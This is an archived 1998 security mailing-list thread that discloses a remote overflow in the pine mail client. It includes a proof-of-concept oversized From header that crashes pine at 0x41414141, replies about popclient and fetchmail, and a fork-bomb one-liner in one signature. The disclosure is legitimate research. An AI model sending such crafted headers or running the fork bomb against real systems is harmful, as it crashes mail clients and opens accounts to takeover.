Date:         Wed, 17 Jun 1998 16:57:28 +0200
From:         Michal Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
Subject:      another remote pine vunerability

Recently I found silly remote overflow in pine. It's so simple there's no
need to describe it:

From: Michal Zalewski <lcamtuf@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA>

...and any attempt of reading this mail will cause:

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

It can be exploited to gain access to remote/local accounts. Fortunately,
too long headers are destroyed by sendmail during prescan (maybe there's
any way to split long line using encoding tricks):

Jun 17 16:49:24 genome sendmail[689]: QAA00689: SYSERR(root): prescan:
token too long

But other mail daemons aren't so strict - it works.

_______________________________________________________________________
Michal Zalewski [lcamtuf@boss.staszic.waw.pl] <= finger for pub PGP key
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
[echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]

---------------------------------------------------------------------------

Date:         Thu, 18 Jun 1998 14:46:00 -0400
From:         "Phillip R. Jaenke" <prj@NLS.NET>
Subject:      Re: another remote pine vunerability

Also, attempting to so much as download *THIS* email I'm quoting here will
cause a panic in 'popclient.' pine is fine, but popclient can't retrieve
email past this message.

> RETR 9
+OK 3897 octets.
(56 lines of message content)
> DELE 1094795585
doPOP3: cleanUp: Bad file descriptor

The only way to get rid of the offending message is by hand. I'd say we've
stumbled on to something that could be rather painful.

--Phillip R. Jaenke (prj@nls.net - InterNIC: PRJ5)
Head Geek, Linux@Comdex Project - http://comdex.linuxos.org/
TheGuyInCharge(tm), Ketyra Designs, Inc.
"For every step I take, I find somebody stepping on my heels." --anonymous
"That's IT! I'm gonna slap Dr.Watson with a malpractice suit!!" --Keihra
! I reserve the right to bill spammers for my time and disk space !

---------------------------------------------------------------------------

Date:         Thu, 18 Jun 1998 23:29:09 +0200
From:         frank@SUN01.CCII.UNIPI.IT
Subject:      Re: another remote pine vunerability

On Thu, 18 Jun 1998, Phillip R. Jaenke wrote:

>
> Also, attempting to so much as download *THIS* email I'm quoting here will
> cause a panic in 'popclient.' pine is fine, but popclient can't retrieve
> email past this message.

I just downloaded this message with fetchmail, so I assume it isn't
affected by the same bug of popclient.

afrodite[40]:~> fetchmail -V
This is fetchmail release 3.8 pl 0

regards.

Francesco Messineo              frank@ing.unipi.it

PGP public key: http://sirius.ccii.unipi.it/~frank/public.asc
KeyID 1024/2937E1A5
Key fingerprint = 5B 41 DC 7C 06 90 29 CA  39 05 59 F5 B3 CC 9A 9D

---------------------------------------------------------------------------